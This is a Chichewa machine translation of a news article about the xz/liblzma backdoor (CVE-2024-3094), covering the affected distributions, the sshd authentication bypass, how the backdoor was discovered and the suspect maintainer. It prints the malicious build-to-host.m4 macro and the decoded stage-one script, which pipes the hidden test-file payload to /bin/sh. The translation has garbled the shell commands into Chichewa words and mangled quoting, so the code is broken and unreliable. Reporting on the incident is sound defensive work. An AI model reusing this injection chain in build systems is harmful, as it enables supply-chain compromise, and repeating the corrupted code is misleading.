Mu phukusi la XZ Utils, lomwe limaphatikizapo laibulale ya liblzma ndi zofunikira zogwirira ntchito ndi data yoponderezedwa mumtundu wa ".xz", nyumba yakumbuyo (CVE-2024-3094) yazindikirika yomwe imalola kulowerera ndi kusinthidwa kwa data yosinthidwa ndi mapulogalamu ogwirizana ndi laibulale ya liblzma. Cholinga chachikulu cha backdoor ndi seva ya OpenSSH, yomwe m'magawo ena imadzaza ndi laibulale ya libsystemd, yomwe imagwiritsanso ntchito liblzma. Kulumikiza sshd ndi laibulale yomwe ili pachiwopsezo kumalola owukira kuti azitha kupeza seva ya SSH popanda kutsimikizika.
Khomo lakumbuyo linalipo muzotulutsa zovomerezeka 5.6.0 ndi 5.6.1, zofalitsidwa pa February 24 ndi Marichi 9, zomwe zidakwanitsa kulowa m'malo ena ogawa ndi nkhokwe, mwachitsanzo, Gentoo, Arch Linux, Debian sid/osakhazikika, Fedora Rawhide ndi 40-beta, openSUSE fakitale ndi tumbleweed, LibreELEC, Alpine edge, Solus, NixOS yosakhazikika, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current, Manjaro kuyesa. Onse ogwiritsa ntchito zotulutsa za xz 5.6.0 ndi 5.6.1 akulimbikitsidwa kuti abwerere ku mtundu wa 5.4.6 mwachangu.
Zina mwazinthu zomwe zimachepetsa vutoli, zitha kudziwika kuti mtundu wa liblzma wokhala ndi khomo lakumbuyo sunathe kukhala gawo lazotulutsa zokhazikika zamagawidwe akulu, koma zidakhudza openSUSE Tumbleweed ndi Fedora 40-beta. Arch Linux ndi Gentoo adagwiritsa ntchito mtundu wosatetezeka wa zx, koma sakhala pachiwopsezo chifukwa sagwiritsa ntchito chigamba cha systemd-notify ku openssh, zomwe zimapangitsa sshd kulumikizidwa ndi liblzma. Khomo lakumbuyo limangokhudza machitidwe a x86_64 otengera Linux kernel ndi laibulale ya Glibc C.
Khodi yotsegulira yakumbuyo idabisidwa m4 macros kuchokera pa fayilo ya build-to-host.m4 yogwiritsidwa ntchito ndi zida za automake pomanga. Pamsonkhano, panthawi yochita zinthu zovuta kwambiri zozikidwa pazosungidwa (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma), zomwe zimagwiritsidwa ntchito kuyesa kulondola kwa ntchito, fayilo ya chinthu chokhala ndi code yoyipa idapangidwa, yomwe idaphatikizidwa laibulale ya liblzma ndikusintha malingaliro ogwiritsira ntchito zina mwazochita zake. Ma m4 macros omwe amatsegula chitseko chakumbuyo adaphatikizidwa ndi ma tarballs omasulidwa, koma sanali m'malo a Git. Panthawi imodzimodziyo, zosungirako zoyesa zoopsa zinalipo m'malo osungiramo zinthu, i.e. munthu amene anakhazikitsa backdoor anali ndi mwayi wofikira kunkhokwe komanso njira zotulutsa zotulutsa.
Mukamagwiritsa ntchito liblzma pamapulogalamu, kusintha koyipa kutha kugwiritsidwa ntchito kuletsa kapena kusintha data, kapena kukhudza magwiridwe antchito a sshd. Makamaka, nambala yoyipa idasokoneza ntchito ya RSA_public_decrypt kuti idutse njira yotsimikizika ya sshd. Khomo lakumbuyo linali ndi chitetezo kuti lisazindikiridwe ndipo silinadziwonetsere pomwe zosintha za LANG ndi TERM zidakhazikitsidwa (i.e., poyendetsa ntchitoyi mu terminal) ndipo zosintha za LD_DEBUG ndi LD_PROFILE sizinakhazikitsidwe, komanso zidayatsidwanso pochita /usr/sbin/sshd fayilo yotheka. Khomo lakumbuyo linalinso ndi njira yodziwira kuphedwa m'malo ochotsa zolakwika.
Makamaka, fayilo ya m4/build-to-host.m4 yogwiritsidwa ntchito gl_am_configmake=`grep -aErls β#{4}[[:alnum:]]{5}#{4}$β $srcdir/ 2>/dev / null` β¦ gl_[$1]_config='sed \Β»r\n\Β» $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
Pakumanga koyamba, ntchito ya grep idapeza fayilo tests/files/bad-3-corrupt_lzma2.xz, yomwe, itatulutsidwa, idatulutsa script: ####Hello#### #345U211267$^D330^W [ ! $(uname) = "Linux"] && kutuluka 0 [! $(uname) = "Linux"] && kutuluka 0 [! $(uname) = "Linux"] && kutuluka 0 [! $(uname) = "Linux"] && kutuluka 0 [! $(uname) = "Linux" ] && kutuluka 0 eval `grep ^srcdir= config.status` ngati kuyesa -f ../../config.status;ndiye eval `grep ^srcdir= ../../config .status` srcdir = "../../$srcdirΒ» fi export i=Β»((mutu -c +1024 >/dev/null) && mutu -c +2048 && (mutu -c +1024 >/dev/ null) && mutu -c +2048 && (mutu -c +1024 >/dev/null) && mutu -c +2048 && (mutu -c +1024 >/dev/null) && mutu -c +2048 && (mutu - c +1024 >/dev/null) && mutu -c +2048 && (mutu -c +1024 >/dev/null) && mutu -c +2048 && (mutu -c +1024 >/dev/null) && mutu - c +2048 && (mutu -c +1024 >/dev/null) && mutu -c +2048 && (mutu -c +1024 >/dev/null) && mutu -c +2048 && (mutu -c +1024 >/ dev/null) && mutu -c +2048 && (mutu -c +1024 >/dev/null) && mutu -c +2048 && (mutu -c +1024 >/dev/null) && mutu -c +2048 && ( mutu -c +1024 >/dev/null) && mutu -c +2048 && (mutu -c +1024 >/dev/null) && mutu -c +2048 && (mutu -c +1024 >/dev/null) && mutu -c +2048 && (mutu -c +1024 >/dev/null) && mutu -c +2048 && (mutu -c +1024 >/dev/null) && mutu -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|mchira -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13 \50-\113" "\0-\377")|xz -F yaiwisi βlzma1 -dc|/bin/sh ####Dziko####
Momwe owukirawo adakwanitsa kupeza mwayi wogwiritsa ntchito projekiti ya xz sizinafotokozedwe bwino. Sizikudziwikanso kuti ndi angati ogwiritsa ntchito ndi ma projekiti omwe adasokonekera chifukwa cha backdoor. Omwe akuti adalemba za backdoor (JiaT75 - Jia Tan), yemwe adayika zolemba zakale ndi code yoyipa m'malo osungiramo, adalemberana ndi opanga Fedora ndikutumiza zopempha zokoka kwa Debian zokhudzana ndi kusintha kwa magawo ku nthambi ya xz 5.6.0, ndipo sanatero yambitsani kukayikira, kuyambira pomwe adatenga nawo gawo pa xz wakhala akupanga zaka ziwiri zapitazi ndipo ndi wopanga wachiwiri malinga ndi kuchuluka kwa zosintha zomwe zachitika. Kuphatikiza pa pulojekiti ya xz, yemwe akuti adalemba za backdoor adatengapo gawo pakupanga xz-java ndi xz-embedded phukusi. Kuphatikiza apo, Jia Tan masiku angapo apitawo adaphatikizidwa mu chiwerengero cha osamalira pulojekiti ya XZ Embedded yomwe imagwiritsidwa ntchito mu Linux kernel.
Kusintha koyipaku kudapezeka pambuyo posanthula kuchuluka kwa CPU ndi zolakwika zopangidwa ndi valgrind polumikizana kudzera pa ssh kupita ku machitidwe a Debian. Ndizofunikira kudziwa kuti kutulutsidwa kwa xz 5.6.1 kunaphatikizanso zosintha zokonzedwa ndi yemwe akuti adalemba za backdoor poyankha madandaulo okhudza kuchepa kwa sshd ndi ngozi zomwe zidawuka pambuyo pakukweza ku mtundu wa zx 5.6.0 ndi backdoor. Kuphatikiza apo, chaka chatha Jia Tan adapanga zosintha zomwe zinali zosemphana ndi "-fsanitize = adilesi" yoyendera, zomwe zidapangitsa kuti ikhale yolumala pakuyesa kwa fuzz.
Source: opennet.ru